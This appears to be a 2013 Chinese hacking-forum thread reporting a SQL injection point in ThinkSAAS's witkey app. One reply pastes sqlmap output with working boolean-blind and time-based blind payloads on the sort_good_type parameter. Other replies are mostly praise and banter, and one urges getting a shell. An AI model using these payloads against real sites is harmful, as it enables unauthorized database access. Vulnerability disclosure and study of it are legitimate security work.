thinksaas

2013-04-08 13:37:07 21 Rices 4738

http://xxxxxxxxxxxxx/index.php?app=witkey&ac=index&sort_industry=&sort_good_type=2[sql]

over

类别 Web安全

关于作者

Rices154篇文章2133篇回复

评论21次

要评论？请先登录或注册

21楼

hang333
2013-4-12 14:48

楼主试试看拿Shell～～

回复|@ta|踩(0)|顶(0)
20楼

a1258771
2013-4-9 19:47

撸主。。。求求求。。。。。。。。。

回复|@ta|踩(0)|顶(0)
19楼

xiaopeng
2013-4-9 19:22

楼主头像才是亮点，，哈哈

回复|@ta|踩(0)|顶(0)
18楼

biying
2013-4-9 15:47

回复|@ta|踩(0)|顶(0)
17楼

kimdle
2013-4-9 14:04

LZ好样的！！！

回复|@ta|踩(0)|顶(0)

16楼

Rank: 1

2013-4-9 11:16

sqlmap跑了下

sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: sort_good_type     Type: boolean-based blind     Title: AND boolean-based blind - WHERE or HAVING clause     Payload: app=witkey&ac=index&sort_industry=&sort_good_type=2 AND 7672=7672&sort_day=&sort_price=&sort_addtime=      Type: AND/OR time-based blind     Title: MySQL > 5.0.11 AND time-based blind     Payload: app=witkey&ac=index&sort_industry=&sort_good_type=2 AND SLEEP(5)&sort_day=&sort_price=&sort_addtime= ---

回复|@ta|踩(0)|顶(0)

15楼

H4xssck3r
2013-4-9 09:26

简单明了，GOOD

回复|@ta|踩(0)|顶(0)
14楼

csser
2013-4-9 00:02

最直接的0day

回复|@ta|踩(0)|顶(0)
13楼

l14of
2013-4-8 23:58

这个App官网米有。

回复|@ta|踩(0)|顶(0)
12楼

xuehei
2013-4-8 23:00

rices ~~~大牛牛~~一直关注着你·~·

回复|@ta|踩(0)|顶(0)
11楼

XiaoMie
2013-4-8 22:02

文章简洁明了甚是喜欢

回复|@ta|踩(0)|顶(0)
10楼

0xcodede
2013-4-8 20:03

这个很干脆

回复|@ta|踩(0)|顶(0)
9楼

飞云小哥哥
2013-4-8 18:10

撸主v5

回复|@ta|踩(0)|顶(0)
8楼

M3loee
2013-4-8 17:24

呆b

回复|@ta|踩(0)|顶(0)
7楼

牧童
2013-4-8 15:59

嘿，Rices大牛发火了，后果很严重~~~~~~~

回复|@ta|踩(0)|顶(0)
6楼

爱绱hack
2013-4-8 15:49

撸过咯！　顶起

回复|@ta|踩(0)|顶(0)
5楼

nowake
2013-4-8 15:22

挖洞比赛。。。

回复|@ta|踩(0)|顶(0)
4楼

package
2013-4-8 14:38

你惹到 Rices牛了

回复|@ta|踩(0)|顶(0)
3楼

Rices
2013-4-8 14:23

艹你爹.

回复|@ta|踩(0)|顶(0)
2楼

M3loee
2013-4-8 14:22

撸主对wy一往情深有木有，都用来做头像了

回复|@ta|踩(0)|顶(0)

热门文章

安全资讯破局者河图：专攻“疑难杂症”的实战派创业逻辑【T00ls人物专访第二十一期】

>追风赶月莫停留，平芜尽处是春山 ### 自我介绍我是河图，香港墨 ...

2025-12-19 14:59:28 12 2606

渗透测试记一次SEO引流后门的webshell应急响应样本分析

写在最前：由于工作性质，不写具体事件前后经过，本贴只对攻击者 ...

2026-02-02 09:31:19 33 1734

安全资讯开源编辑器Notepad++更新程序存在安全漏洞被劫持流量投毒请用户注意杀毒和更新

开源文本和代码编辑器 Notepad++ 日前被安全专家发现安全漏洞， ...

2025-12-12 16:51:19 8 2266

安全资讯Anthropic称中国AI公司利用1600万次Claude查询复制模型

Anthropic周一表示，它发现了由三家人工智能(AI)公司DeepSeek、M ...

2026-02-25 05:57:55 6 645

安全资讯霍尼韦尔关键基础设施闭路电视监控系统存在身份验证绕过漏洞

美国网络安全和基础设施安全局 (CISA) 警告称，多款霍尼韦尔闭路 ...

2026-02-20 00:43:43 6 742

精华推荐

渗透测试前端加密对抗2-通过CDP远程调用Debug断点函数

# 前端加密对抗Part2-通过CDP远程调用Debug断点函数接上篇 (http ...

2023-04-13 00:24:27 27 70865

渗透测试命令行上传文件到SkyDrive的研究

0x01 背景我比较怕被查水表，所以常年混迹在国外的网络。但是从 ...

2012-12-26 21:06:21 35 12312

渗透测试【开源】HTTPDecrypt for Android Penetration Test

# HTTP Decrypt利用HTTP协议远程加解密数据包，实现Burp一条龙 ...

2019-05-06 15:06:22 58 35672

渗透测试upload-labs 21关通关笔记及总结

upload-labs 记录及文件上传总结。靶机地址：https://github.com ...

2020-01-11 19:16:12 29 1235

渗透测试『代码审计』如何解密 PHP 代码

# 『代码审计』如何解密 PHP 代码---> 日期：2022-04-21>> 作者 ...

2022-04-21 09:46:14 12 747

Top ↑